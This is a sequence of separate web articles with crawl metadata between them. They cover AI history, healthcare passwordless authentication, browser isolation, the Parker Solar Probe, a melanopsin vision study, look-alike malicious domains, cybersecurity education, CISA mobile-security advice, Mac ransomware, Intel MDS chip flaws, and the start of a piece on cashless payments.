Attempts at creating artificial intelligence go back decades. In the wake of World War II, the English mathematician and codebreaker Alan Turning penned his definition for true artificial intelligence. Dubbed the Turing Test, a conversational machine would have to convince a human that he was talking to another human. It took 60 years, but a computer finally passed the Turing Test back in 2014, when a chat bot developed by the University of Reading dubbed “Eugene” convinced 33% of the judges convened by the Royal Society in London that he was real. It was the first time that the 30% threshold had been exceeded. Since then, the field of deep learning and AI has exploded as computers get closer to delivering human-level capabilities. Consumers have been inundated with an array of chat bots like Apple‘s Siri, Amazon‘s Alexa, and Microsoft‘s Cortana that use natural language processing and machine learning to answer questions.
Understanding and Neural Networks
Researchers have found that the combination of advanced neural networks, ready availability of huge masses of training data, and extremely powerful distributed GPU-based systems have given us the building blocks for creating intelligent, self-learning machines that can rival humans in understanding. As Google Fellow Jeff Dean explains, the rapid evolution in big data technologies over the past decade has positioned us well to now imbue machines with near human-level understanding. “We now have a pretty good handle on how to store and then perform computation on large data sets, so things like MapReduce and BigTable that we built at Google, and things like Spark and Hadoop really give you the tools that you need to manipulate and store data,” the legendary technologist said during last June’s Spark Summit in San Francisco. “But honestly, what we really want is not just a bunch of bits on disk that we can process,” Dean continues. “What we want [is] to be able to understand the data. We want to be able to take the data that our products or our systems can generate, and then built interesting levels of understanding.” […]
|
<urn:uuid:1ca8d130-3687-4d9b-b30f-eaa5e05aa117>
|
CC-MAIN-2022-40
|
https://swisscognitive.ch/2017/02/03/why-deep-learning/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00446.warc.gz
|
en
| 0.951816 | 500 | 3.0625 | 3 |
In 2022, healthcare was ranked as the most breached sector with some of the weakest passwords. This should come as no surprise. The COVID-19 pandemic, coupled with the resulting digital acceleration, has led to a burgeoning digital health industry in Asia that is expected to reach US$10 billion by 2025.
As healthcare organisations move further along their digital transformation journey and more of our health-related data being transmitted or stored online, there is an increasingly urgent need for companies to strengthen their cybersecurity postures. While there are various steps that healthcare organisations can take, it is important that they address one key issue: passwords.
The problem with passwords
The healthcare sector has long been plagued by data breaches, even before the pandemic. For example, in 2018, Singapore faced one of its worst data breach attacks. Hackers infiltrated the computers of SingHealth, Singapore’s largest group of healthcare institutions, and stole the personal particulars of 1.5 million patients – including that of the country’s prime minister’s.
More recently in January 2022, approximately 39 million health records were reportedly stolen from a hospital in Thailand and offered for sale on an internet database-sharing forum.
As we continue to see an upward trend of data breaches, one cannot not help but ponder the question: What role do passwords play in such cyberattacks?
Experts have long warned about the fallibility of knowledge-based authentication such as passwords. Poorly managed, easily guessed, and stolen passwords are the most common reasons for data breaches. At the core, knowledge-based credentials like passwords are human-readable and can be pried out of users’ hands by hackers through various methods such as phishing, credential stuffing, or password spraying.
Even good cyber hygiene alone is insufficient as cyberthreats continue to evolve. For instance, the average user has nearly 200 pairs of usernames and passwords, which is challenging to remember and keep track of.
Particularly in the healthcare sector, where speed and efficiency are of the essence, this has led to many healthcare workers reusing the same few passwords. Such habits magnify the threat of an account takeover, as just one leaked password can put all other accounts at risk.
What are the options?
That said, how can we address these issues?
The answer lies in moving away from knowledge-based “secrets” like passwords to possession-based authentication methods that are simpler, faster, and more secure. Going passwordless takes the guesswork out of secure, frictionless authentication – an increasingly urgent priority as healthcare goes digital. These techniques leverage devices that we have at our fingertips, such as using smartphone biometrics or a hardware security key.
While this only requires a single gesture by the user behind the scenes, an advanced cryptographic authentication dialogue takes place between a “private key” stored securely on the user’s device and its “public key” counterpart on the service provider’s server. Hence, relying on advanced cryptographic algorithms instead of human recollection makes the authentication process far more secure. Furthermore, going passwordless leads to plenty of options for authentication. For instance, when a healthcare worker is wearing gloves, he or she can use either facial recognition or PIN to access the system. Such an approach has been proven to be resistant to phishing and account takeovers.
Users of digital health services will be looking for convenient and seamless online experiences, and that starts from the logging-in process. A report by Jumio showed that 63% of consumers are more likely to engage with a business in the healthcare industry that performs robust identity verification, highlighting authentication as an important factor when choosing to engage with an organisation.
Passwordless authentication is the new reality
Passwordless authentication is fast becoming our new reality as more companies pledge to eliminate passwords. Big tech companies like Google, Microsoft, and Apple have also already expanded their support for a common passwordless sign-in standard – potentially paving the way for hundreds of millions of users to go password-free soon.
There is no better time than now for the healthcare industry to take a step forward to adopt common passwordless sign-in standards, especially as many organisations in the sector embrace digital transformation. Of course, it is crucial to note that standardised authentication alone cannot solve security issues unless it is widely adopted throughout the healthcare industry.
Overall, a consistent approach to security and standardised authentication that flows across healthcare platforms and apps is urgently needed to protect patients and their health data.
|
<urn:uuid:b10f1f94-c431-47cd-a035-b0e21aa26756>
|
CC-MAIN-2022-40
|
https://www.frontier-enterprise.com/addressing-healthcares-password-problem/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00446.warc.gz
|
en
| 0.950025 | 916 | 2.640625 | 3 |
Maybe you noticed this news item from just a short while ago: a developer at A9t9, creators of the CopyFish Browser extension, was duped into opening a link in a phishing email. Clicking that fraudulent link sent the developer to a fake Google Account login page where he entered credentials, giving the hacker access to the developer’s A9t9 account. With this access, the hacker pushed a malicious update of CopyFish extension to Chrome users, allowing potentially malicious adware to be loaded onto vulnerable users’ computers. As of this writing, the attackers still have control of the extension: Anyone still running it is advised to uninstall — pronto.
While this story is particularly galling, attacks that infect computers via application and browser vulnerabilities are a dime a dozen. The Ponemon Institute estimates that 75% of companies have been affected at some point by browser and application-based malware and attacks like these generate about 80% of malware on corporate networks.
How Browser and Application-based Malware Does its Dirty Work
Browser and application-based malware makes its way onto computers and devices in many ways. In one classic delivery method, the attacker creates a malware-laced banner or ad (referred to as a malvertisement). Sad to say, this isn’t much of a challenge. He or she submits the “ad” to legitimate third party advertising networks which serve websites that host ads.
These networks don’t necessarily check the legitimacy of ads submitted to them. In some cases, they actually do check out ads to be sure they aren’t malicious. Smart attackers, however, programmed malvertisements to be safe until delivery to websites where they’ll be displayed. Either way, when an innocent browser lands on a page with an infected ad, the banner code scans his computer for application vulnerabilities. When and if it finds one, it essentially “drops” the malware into that hole, and voila, he’s got malware.
To get the most bang for their buck, attackers use attack vectors such as Java, Adobe Reader and Flash, and Internet Explorer, which are among the most commonly installed applications. This helps them reach the widest range of victims and do a great deal of damage with little effort on their part.
Just think about Adobe Flash, banned from iOS by Steve Jobs back in 2010. This less-than-secure application has been a hacker favorite for years because in its heyday, almost everybody had it installed. Malware distributors knew they could rely on ’old faithful’ to have some new, yet-unpatched vulnerability that they could exploit to spread malware. Though Flash is slated to meet its maker in 2020, it still persists, vulnerabilities and all.
And here’s the rub; even if there were no Flash, no Reader and no Java, browser and application-based malware could still do its worst, because even the most secured applications and browsers can become compromised at times, as the CopyFish incident proved. While killing Flash is a good (great!) move, it’s hardly the end of internet-based threats.
This is just one of the reasons why Gartner’s report on the top 10 security solutions for 2017 names remote browsing — also known as browser isolation – as the answer to “the cesspool that is the internet”: “Information security architects can’t stop attacks but can contain damage by isolating end-user internet browsing sessions from enterprise endpoints and networks.”
Security Through Isolation
Browser isolation works by containing all activity in a disposable browsing session that gets “thrown away” each time a user logs off or simply closes the browser, or the browser tab that they’re in. With the right isolation solution, you can freely browse the web from any browser, OS and device, the same way you do today, without negatively impacting the user experience and without endangering your network.
All internet browsing sessions are routed through the isolation safe zone. Each time you create an additional browsing session or open an additional browser tab, an additional isolated browser container is spun up. All content is rendered as a visual stream in the original browser. It looks like the webpage, it acts like the webpage, it interacts like the webpage — it’s just completely secured from any potential infiltration. And when the session is over, the isolation zone container is destroyed, along with any malware it contains.
Attackers are experts at changing things up, at finding new ways to get to the data they want. Don’t be caught playing catch-up! Isolating your browsers and applications from the web is the key to effectively blocking even zero-day exploits from all entry points, and fully — finally — prevent attackers from getting the access they crave.
|
<urn:uuid:631199db-d755-4a46-8c86-34bba4a92693>
|
CC-MAIN-2022-40
|
https://blog.ericom.com/the-key-to-real-security-is-browser-isolation/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00446.warc.gz
|
en
| 0.930727 | 990 | 2.59375 | 3 |
NASA says the plan for the Parker Solar Probe is to orbit within 3.9 million miles of the sun’s surface. This is NASA’s first mission to the sun and its outermost atmosphere, called the corona. The mission is scheduled to end in June 2025.
The mission’s objectives include tracing the flow of energy that heats and accelerates the sun’s corona and solar wind. Determining the structure and dynamics of the plasma and magnetic fields at the sources of the solar wind. Explore mechanisms that accelerate and transport energetic particles.
After liftoff from Kennedy Space Center in Florida in July 2018. The Parker Solar Probe will become the first to fly directly into the sun’s atmosphere. A 20-day launch window for the spacecraft’s liftoff atop a Delta IV Heavy rocket opens July 31, 2018. NASA is sending a roughly 10-foot-high probe on the historic mission. That will put it closer to the sun than any spacecraft has ever reached before. Wearing a nearly 5-inch coat of carbon-composite solar shields. NASA’s Parker Solar Probe will explore the sun’s atmosphere in a mission that begins in the summer of 2018. The probe will eventually orbit within 3.9 million miles of the sun’s surface.
The probe will reach a speed of 450,000 mph around the sun. On Earth, this speed would enable someone to get from Philadelphia to Washington in one second, the agency said. The mission will also pass through the origin of the solar particles with the highest energy. Solar wind is the flow of charged gases from the sun that is present in most of the solar system. That wind screams past Earth at a million miles per hour, and disturbances of the solar wind cause disruptive space weather that impacts our planet. Space weather may not sound like something that concerns Earth, but surveys by the National Academy of Sciences have estimated that a solar event without warning could cause $2 trillion in damage in the United States and leave parts of the country without power for a year.
In order to reach an orbit around the sun. The Parker Solar Probe will take seven flybys of Venus that will essentially give the probe a gravity assist. Shrinking its orbit around the sun over the course of nearly seven years. The probe will eventually be closer to the sun than Mercury. It will be close enough to watch solar wind whip up from subsonic to supersonic. When closest to the sun, the probe’s 4½-inch-thick carbon-composite solar shields will have to withstand temperatures close to 2,500 degrees Fahrenheit. Due to its design, the inside of the spacecraft and its instruments will remain at a comfortable room temperature.
The observations and data could provide insight about the physics of stars, change what we know about the mysterious corona, increase understanding of solar wind and help improve forecasting of major space weather events. Those events can impact satellites and astronauts as well as the Earth including the power grid and radiation exposure on airline flights, NASA said.
Mission Re-named after astrophysicist
Initially called Solar Probe Plus, the mission was renamed after the astrophysicist Eugene Parker, 89, professor emeritus at the University of Chicago. He published the first paper to describe solar wind the high-speed matter and magnetism constantly escaping the sun in 1958.
|
<urn:uuid:d57da6ec-c0e2-4fd1-a486-6be2b4858823>
|
CC-MAIN-2022-40
|
https://areflect.com/2017/06/07/nasas-mission-to-fly-into-suns-atmosphere-in-2018/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00446.warc.gz
|
en
| 0.928361 | 692 | 3.484375 | 3 |
Reflexive system of the human eye
Human eye are not only for seeing, and also have other important biological functions, including automatic visual reflexes.
According to a new study from the University of Pennsylvania, the reflexive system of the human eye produces a conscious, visual experience. The researchers said, the high light sensitivity sometimes experienced by people with eye disease, migraine headaches and concussions.
However, researchers created a special pulse of light that stimulates only the melanopsin cells, a blue-light sensitive protein in the eye.
Melanopsin is a part of our visual system, it controls several important biological responses to light, said, lead author, Manuel Spitschan. If we have a visual experience that assists these reflexes, as the normal light that stimulates melanopsin will also stimulate the cone cells of the eye.
To solve this problem, the researchers developed a special kind of light pulse that stimulates melanopsin, but is invisible to the cones. These lights switch between computer-designed “rainbows” of light.
For testing, researchers recorded people pupil response who watches these light pulses. They confirmed that the light pulse invisible to the cones brings a slow, reflexive constriction of the pupil. They then measured brain activity and found that the visual pathway of the brain answer to the melanopsin stimulus.
“This was a particularly exciting finding,” said senior author Geoffrey K. Aguirre, MD, PhD, an associate professor of Neurology at Penn. A neural response within the occipital cortex suggests that people have a conscious experience of melanopsin stimulation is explicitly visual.
The research work can understand the experience of people with photophobia. “Research on mice makes us think that melanopsin contributes to the sensation of discomfort from a very bright light,” Aguirre said.
The new study found the melanopsin stimulus causing discomfort, and people with photophobia may also experience a stronger form of this response to melanopsin. So, the new tool helps us to better understand the excessive light sensitivity.
More information: [PNAS]
|
<urn:uuid:f5655d05-2eb9-4d29-b34f-380c1416588a>
|
CC-MAIN-2022-40
|
https://areflect.com/2017/11/01/a-reflexive-system-of-the-human-eye-produces-a-conscious-visual-experience/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00446.warc.gz
|
en
| 0.919786 | 440 | 3.53125 | 4 |
Finjan found out that hackers and cyber-criminals are exploiting a loophole in the domain name registration process to infect visitors to legitimate websites and increase the life cycle of cyber-attacks.
Attacks using this method typically involve a “copycat” domain name that is strikingly similar in spelling to the domains of legitimate sites.
Leveraging the similarity to legitimate and frequently used domain names enables these attacks to go unnoticed by webmasters and security solution providers.
The abuse of trusted domain names attack vector was spotted during October by Finjan’s Malicious Code Research Center (MCRC) when searching for popular services with a slight change of the top level domain.
When Finjan’s MCRC investigated (http://go*gle-stat******.org/ where * has obscured some of the characters of the domain) it was found that it took advantage of a domain name similar to a legitimate popular service, which contains malicious code that is designed to download and execute a Trojan on the visitor’s machine. The malicious code itself is located on the abused domain name.
When Finjan researched where the domain name hosting the malicious site was located, it came across another interesting finding. The code was located on a trusted controlled IP address.
Shortly after contacting the security team of that domain, Finjan was notified that the necessary action had been taken.
A subsequent check showed that, indeed, the malicious code is no longer available on the hosting servers.
Since registering a domain name is not a process that is being adequately policed and scrutinized, cybercriminals can potentially create a malicious website using any domain name they like (provided it isn’t already taken).
Finjan’s research indicates that criminals have taken advantage of this loophole to create “copycat” sites intended to host web-based attacks, using intentionally misleading domain names.
When using URL classification or reputation as a security solution, requests to URLs or domains known to be malicious can be blocked regardless of the content on the page; however the effectiveness of blocking requests to known malicious domains relies on maintaining an up-to date list of such sites.
Due to the rapid growth and volume of malware hosted online, gathering sufficient data as quickly as malicious domains appear (and disappear) on the web is almost impossible.
As website content is becoming more volatile, and domain names can be set up for brief periods of time, the task of “keeping track” of malicious content on the Web is becoming ever more difficult.
When attacks involve a domain name that is strikingly similar in spelling to the domains of legitimate sites and hosted on trusted IP addresses, the similarity to legitimate and frequently used domain names enables them to go unnoticed by most webmasters.
Combined with code obfuscation and other evasive techniques, these scripts trigger attacks that result in malicious code – typically crimeware Trojans - being downloaded to the user’s machine.
It is important for attacks to be detected in real-time without the reliance on the host IP address reputation or domain name.
|
<urn:uuid:dd28e372-bab9-48be-b99a-edce03d79f24>
|
CC-MAIN-2022-40
|
https://www.itproportal.com/2007/11/15/hackers-are-abusing-trusted-domain-names/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00446.warc.gz
|
en
| 0.93019 | 628 | 2.953125 | 3 |
Give a man a fish and you feed him for a day; teach a man to fish and you feed him for a lifetime. ~ MaimonidesThe education sector has had its share of breaches. And schools, like medical and retail institutions, continue to struggle when it comes to securing their highly-priced assets: student and staff data and intellectual property. This is a big challenge for many. Unfortunately, it's not the only challenge they face.
The education sector is pressured to address skills shortage, not just within the cybersecurity industry but in their own as well. Educators are also faced with the challenge of teaching the current and future generation of students about cybersecurity and privacy, fields which for most of them are relatively new and challenging to learn. Furthermore, engaging students to start considering careers in cybersecurity—much less getting them interested and talking about it—is another hurdle to conquer.
Educators are left wondering, "How can I even begin to tackle all this?" Before we start concerning ourselves with what to do with students, here are two questions teachers must ask themselves first:
How prepared am I for this?Remember that a mark of good teaching is the knowledge, firm grasp, and familiarity with the subject matter. Teachers both new and experienced who are willing to take up teaching cybersecurity can start off by learning more about this subject for themselves, understanding why it's crucial that every citizen of every country must play their part, and how they can make a difference in the burgeoning fight against cybercrime. There are some ways this can be done:
- Get trained. The National Initiative for Cybersecurity Careers and Studies (NICCS), an online resource and training hub managed by the Department of Homeland security, offers cybersecurity training for educators for free. They can check out the materials from the NICCS official website.
- Seek mentors among experienced cybersecurity educators and/or professionals. It's always good to have someone show you the ropes on something you're not that familiar with yet. Same is true for educators, and there's no shame in asking to be mentored. After all, educators can benefit from the best and brightest minds in this field, as do the students.
- Teach yourself via the Internet. Self-learning is always an option, and there are free and available materials an educator can use for studying online. Cybersecurity Ventures also has a hefty list of private institutions that educators and their organizations can invite to do in-house training. Lastly, the National Initiative for Cybersecurity Education (NICE), which is a program of the National Institute of Standards and Technology in the Department of Commerce, has more materials teachers can pore over.
What methods can I use to introduce this new subject to my students?Making cybersecurity palatable to K–12 students is something educators must prepare and plan ahead for. For some organizations, the availability of technology has made it easier for teachers to use methods beyond the blackboard and textbooks.
This doesn't mean that old yet effective methods of instruction are entirely forgotten. Instead, integrating technology must be used alongside tools that already work in a classroom. Technology also livens up the class, making it conducive for students to accept the new subject matter. TeachHub recommends that teachers undergo the four stages of technology integration, which are substitution, augmentation, modification, and redefinition, should they decide to take advantage of new learning tools using technology. And when it comes to training students on cybersecurity, it's a must.
We can't give what we don't have. In this case, educators cannot impart knowledge about cybersecurity without (or are in the process of) gaining sufficient learning about it themselves. So it's essential to undergo this step before moving on to the next.
Ways to get students interested and involved in cybersecurityThe majority of educators love teaching because they also like working with young kids. And starting them young is the ideal stage to discuss cybersecurity. How young? Some say once they begin elementary school; for others, there is really no defined age. As long as the kids (1) are mature enough mentally to be taught about the importance of safe computing, and (2) are already using technology, such as a smartphone or tablet, then we can say they are ready to take this new step to learning.
Like any list, the outline below isn't exhaustive. This is also, by no means, not an ordered list of steps but rather a list of guidelines you can follow (and reject) at your discretion. As educators, you can branch out and look for other ways. Keep honing your methods and replacing them with new, more efficient ones. So without further ado, below are methods we're proposing for kids:
1. Join boot camps. Independent and private organizations can conduct cybersecurity camps for kids and teens. It's up to the educator to learn more about such programs, getting as much information as they can, and then choosing which camp they'd vouch for their students to join. Examples of camps are GenCyber, Cyber Camps by the US Cyber Challenge, and Tech Camps by ID Tech.
2. Join competitions. This is probably applicable from middle- to university-level contests that can be in-school or out-of-school. Examples are Carnegie Mellon's picoCTF, CyberFirst Girls Competition (in the UK), CyberPatriot, and Global Cyberlympics.
3. Go on tours. Some schools can organize trips within government and private sector offices that deal with cybersecurity.
4. Get an internship. Students at the high school level (as young as) can apply for an internship to companies that have openings for information security teams. An internship is the closest hands-on experience they can gain in a real-world setting. Educators can encourage their students to go for this, or go that extra mile and vouch for the students to companies they want to intern.
5. Volunteer to teach younger generations about cybersecurity. This may apply to high school and university-level students who would be graduating. Not only would this help educators immensely by being unburdened from some of the tasks of teaching, but it can also be a positive experience for students while putting themselves in the shoes of being a mentor. Who knows—they might actually take an interest in teaching cybersecurity for the next generation.
And as for teachers, they can help students by doing the following:
1. Provide them a role model. Kids and teens need someone they can look up to or model after, even when they don't realize it at first—This could explain why YouTube stars are so famous. If you want to encourage kids and teens to be an expert in the field of their interest in the future, educators must introduce to them personalities they can emulate. Are the little girls in class a fan of Taylor Swift? Mention that Swifty is actually besties with Karlie Kloss, international supermodel and coder.
2. Develop their soft skills. While tech and coding skills may be necessary for several job positions, soft skills—especially when sharpened to the point of awesomeness—can not only get the post-grad through the door but can also keep them employed for a long time.
In a previous blog post, we asserted that if one wants to work in cybersecurity, they don't have to be too technical or know how to code. In fact, some are saying that the skills shortage being experienced in this industry is not about lacking technical people. Instead, the industry requires technical people who also have other skills like advanced reading, advanced writing, communication, management, organization, critical thinking, and troubleshooting skills. Most employers actually consider soft skills as more important than hard skills.
3. Recognize talents that they can use in cybersecurity. Some students may feel put off or inadequate in pursuing careers that they deem too technical. Musical individuals and those with above-average eye-hand coordination (e.g., video game players), they say, may have a high opportunity of success in the cybersecurity field. They are creative personalities who can think outside the box when it comes to solving problems and innovation, especially when they are adequately trained. Educators can utilize the studies behind these claims to pique student interest for a start.
4. Provide a platform for students to learn, share, and apply what they learned. At this day and age, it may not be difficult to find a platform. We have already mentioned YouTube above. There is also GitHub for the code monkeys, and, if your child is into messaging instead of social networking sites to get in touch with their friends, there is Discord, where they can create a room and throw ideas around to members who can help refine them. There is also Twitch, where some game modders actually broadcast themselves coding and testing the code of the game they want to improve on.
5. Gamify learning. Gamification, or the use of game mechanics and design, to drive home important points that may otherwise leave students confused can bring about high engagement. Not to mention, it's extremely fun. There are some ways educators can apply this. They can change the class grading system from letter grades to "experience points" (or XP in the gaming world) as one teacher already demonstrated, awarding students with tangible incentives like badges, conduct tournaments among small groups within the class, and using actual games that teach about cybersecurity, privacy, and hacking. For middle- to high-school educators, assess if you can introduce your students to games like TIS-100, Shenzhen I/O, and Uplink. Zachtronics have more and various games to offer on their website.
6. Teach them the necessary security skills. One cannot be equipped to work in cybersecurity—or, in this day and age, in any industry—until they know basic cybersecurity hygiene. This is fundamental, but it shouldn't stop there. Students will learn and adapt better security techniques to protecting their own and company assets once they advance in their education and begin working. But having some sort of security cornerstone or foundation must be there to build on.
7. Ingrain in them the importance of continuous development. Education shouldn't begin and end in institutions. This may seem like a no-brainer, but it is important to remind students that although learning on the job is essential, it is equally important to make an effort to understand concepts they haven't encountered in the classroom by reading books and researching about them online. Life these days is fast-paced, and if one is not paying attention, valuable knowledge can just pass us by.
8. Expand cybersecurity education and training efforts to include all students. This may be applicable only in a university setting. Expanding cybersecurity education means that it shouldn't be only students in STEM courses being trained on it. The curriculum should include practical applications of security in their career of choice and how insecure practices may potentially jeopardize not just their employment but also the clients they serve. Real-world scenarios and examples are the best case studies.
The cool factorWhile educators expose students to the exciting and highly positive aspects of cybersecurity, it's unavoidable for them to also see the other side of it: the exploits, methodologies, and (if the information is available) the people behind cybercrimes and threat actor groups that the cybersecurity industry is battling against.
Thanks to increased media coverage on successful breaches, availability of written works and videos on various hacktivist ideologies, and the dramatization of the misuse of computer and network prowess in television series and movies, students have more to internalize and mentally process today compared to previous generations. Unfortunately in today's culture, more and more are not taking the time to think things through before acting. In many instances, kids and teens like to do things because of "the cool factor" involved.
This isn't entirely a bad thing. The dramatization of hacking in TV and movies, no matter how poorly they were presented, has inadvertently put cybersecurity on the media map, undoubtedly sparking viewers' imaginations, helping form idealisms and dreams, and pushing intellectuals and creatives alike to pursue the "what ifs."
So if you hear students expressing sympathy over Elliot Alderson's plight in taking down an evil corporation that he works for, a liking to Penelope Garcia's focus and quick wit in the midst of life-or-death situations, or a deep fascination for Harold Finch's selflessness and fierce loyalty to the cause of saving and not taking lives, let them. But also bring them gently back down to reality and introduce eye-opening documentaries of real-life hackers and how the cyberculture came about.
CyberRisk named a few titles in a recent blog post, from Hackers in Wonderland (2000) to Hackers are People, Too (2008). Of course, we'd like to add The Triumph of the Nerds: The Rise of Accidental Empires (1996), Downloaded (2013), The Internet's Own Boy: The Story of Aaron Swartz (2014), Deep Web (2015), and Softwaring Hard (2014).
Heck, if these aren't cool for them, then I don't know what is.
|
<urn:uuid:92c662dd-d3b1-44ed-abf1-31fe7c578d82>
|
CC-MAIN-2022-40
|
https://www.malwarebytes.com/blog/news/2018/05/engaging-students-cybersecurity-primer-educators
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00446.warc.gz
|
en
| 0.95938 | 2,672 | 2.71875 | 3 |
The Cybersecurity and Infrastructure Security Agency (CISA) has released two actionable Capacity Enhancement Guides (CEGs) to help users and organizations improve mobile device cybersecurity.
One of the guides is intended for consumers. There are an estimated 294 million smart phone users in the US, which makes them an attractive target market for cybercriminals. Especially considering that most of us use these devices every day.
The advice listed for consumers is basic and our regular readers have probably seen most of it before. But it never hurts to repeat good advice and it may certainly help newer visitors.
- Stay up to date. Make sure that your operating system (OS) and the apps you use are up to date, and enable automatic updating where possible.
- Use strong authentication. Make sure to use strong passwords or pins to access your devices, and biometrics if possible and when needed. For apps, websites and services use multi-factor authentication (MFA) where possible.
- App security:
- Use curated app stores and stay away from apps that are offered through other channels. If they are not good enough for the curated app stores, they are probably not good for you either.
- Delete unneeded apps. Remove apps that you no longer use, not only to free up resources, but also to diminish the attack surface.
- Limit the amount of Personally Identifiable Information (PII) that is stored in apps.
- Grant least privilege access to all apps. Don't allow the apps more permissions than they absolutely need in order to do what you need them to do, and minimize their access to PII.
- Review location settings. Only allow an app to access your location when the app is in use.
- Network communications. Disable the network protocols that you are not using, like Bluetooth, NFC, WiFi, and GPS. And avoid public WiFi unless you can take the necessary security measures. Cybercriminals can use public WiFi networks, which are often unsecured, for attacks.
- Protection. – Install security software on your devices. – Use only trusted chargers and cables to avoid juice jacking. A malicious charger or PC can load malware onto smartphones that may circumvent protections and take control of them. A phone infected with malware can also pose a threat to external systems such as personal computers. Enable lost device functions or a similar app. Use auto-wipe settings or apps to remove data after a certain amount of failed logins, and enable the option to remotely wipe the device.
- Phishing protection. Stay alert, don't click on links or open attachments before verifying their origin and legitimacy.
The guide for organizations does duplicate some of the advice given to consumers, but it has a few extra points that we would like to highlight.
- Security focused device management. Select devices that meet enterprise requirements with a careful eye on supply chain risks.
- Use Enterprise Mobility Management solutions (EMM) to manage your corporate-liable, employee-owned, and dedicated devices.
- Deny access to untrusted devices. Devices are to be considered untrusted if they have not been updated to the latest platform patch level; they are not configured and constantly monitored by EMM to enterprise standards; or they are jailbroken or rooted.
- App security. Isolate enterprise apps. Use security container technology to isolate enterprise data. Your organization’s EMM should be configured to prevent data exfiltration between enterprise apps and personal apps.
- Ensure app vetting strategy for enterprise-developed applications.
- Restrict OS/app synchronization. Prevent data leakage of sensitive enterprise information by restricting the backing up of enterprise data by OS/app-synchronization.
- Disable user certificates. User certificates should be considered untrusted because malicious actors can use malware hidden in them to facilitate attacks on devices, such as intercepting communications.
- Use secure communication apps and protocols. Many network-based attacks allow the attacker to intercept and/or modify data in transit. Configure the EMM to use VPNs between the device and the enterprise network.
- Protect enterprise systems. Do not allow mobile devices to connect to critical systems. Infected mobile devices can introduce malware to business-critical ancillary systems such as enterprise PCs, servers, or operational technology systems. Instruct users to never connect mobile devices to critical systems via USB or wireless. Also, configure the EMM to disable these capabilities.
While you may not feel the need to apply all the advice listed above, it is good to at least know about it and consider whether it fits into the security posture that matches your infrastructure and threat model.
Stay safe, everyone!
|
<urn:uuid:dd767b4a-05da-4443-bd13-c96ed16737a1>
|
CC-MAIN-2022-40
|
https://www.malwarebytes.com/blog/news/2021/11/improving-security-for-mobile-devices-cisa-issues-guides
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00446.warc.gz
|
en
| 0.913044 | 956 | 2.609375 | 3 |
The first instances of ransomware attacks on Mac users were discovered this weekend. Ransomware is a type of malware that encrypts users’ data and then requires money or another form of ransom for the data to be released.
In the past, ransomware was mostly targeted towards Android and Windows users. Researchers at Palo Alto Networks detected the first instances of ransomware amongst Mac products last Friday, when they discovered OS X Bit Torrented infected by ransomware.
Researchers informed Apple of the infection immediately, and Apple reversed the security certificate the ransomware distributors initially bypassed. Apple’s quick response prevented any other users from falling victim to ransomware over the weekend.
|
<urn:uuid:2378ce4d-9b02-428c-befb-964af722e807>
|
CC-MAIN-2022-40
|
https://hobi.com/mac-users-ransomware/mac-users-ransomware/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00446.warc.gz
|
en
| 0.896513 | 130 | 2.59375 | 3 |
Last week, Intel and independent security researchers announced that Intel chips have another flaw that could potentially let hackers pull sensitive information from microprocessors. The researchers say that the flaw is vulnerable to four new attacks, each of which can capture information like encryption keys and passwords — the quintessential building blocks of security for nearly all computing devices. Wired, who also reported research on the issue, said the flaw affects millions of PCs.
The flaw is in the same family as the 2018 Meltdown and Spectre flaws and contains various similarities. The new vulnerabilities are built into Intel hardware and go by various names. ZombieLoad, Fallout, or RIDL are just some to name a few; the more technical name is Microarchitectural Data Sampling (MDS).
How you should respond to MDS is probably exactly what you expect: update your operating system when it asks you to and also make sure your browser is up to date — either can be a vector for these new attacks. Only devices running on Intel chips are affected (though it’s all of them between 2011 the release of fairly recent chips), so iOS devices and the vast majority of Android devices are safe. And it should also be said that there’s been no reported exploits taking advantage of these vulnerabilities in the wild.
Intel said in a statement that the best way to protect yourself from attacks targeting this flaw is to keep your system software updated. The flaw has been fixed on Intel Core processors from the 8th and 9th generation, as well as the Intel Xeon Scalable processor family’s 2nd generation. Other chips can be fixed with updates to software called microcode, which solve the problem without having to rewrite the hard coded features of a microprocessor.
Here are the MDS information pages from a bunch of big software vendors, all of whom have already provided patches or will do so in the very near future:
- Red Hat
The announcement indicates that this type of flaw, which was novel when reports of Meltdown and Spectre were first announced, is an area of intense research, and experts might continue to find serious chip flaws down the road. Intel and other chip makers face the challenge of addressing flaws that allow these kinds of attacks without sacrificing the performance of their microprocessors.
The company also released data on how its fixes to the flaw are affecting different processors’ performance.
|
<urn:uuid:34cf96ea-8e0c-4075-92d4-562e51f1bd90>
|
CC-MAIN-2022-40
|
https://hobi.com/new-intel-chip-flaw-leaves-your-pc-exposed-again/new-intel-chip-flaw-leaves-your-pc-exposed-again/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00446.warc.gz
|
en
| 0.962612 | 489 | 2.59375 | 3 |
In many ways, the UK is progressing towards becoming a cashless society. Despite this, there is a range of barriers threatening to undermine the UK’s ability to fully embrace this transition. From a lack of trust in new technology to a sentimental connection to existing payment methods, these barriers must be both identified and overcome if the UK is to operate in the modern climate.
The latest Access to Cash review revealed debit cards are now the most popular payment method in the country. But the decline of cash payments is not good news for all of us. Around 8,000,000 UK adults — 17% of the population — would struggle to cope in a cashless society. Many of these are from vulnerable groups: the poor, those with physical and/or mental health challenges and people without bank accounts are all disproportionately likely to rely on cash.
While the UK as a whole has been rated among the nations most ready to go cashless, some residents are clearly readier than others.
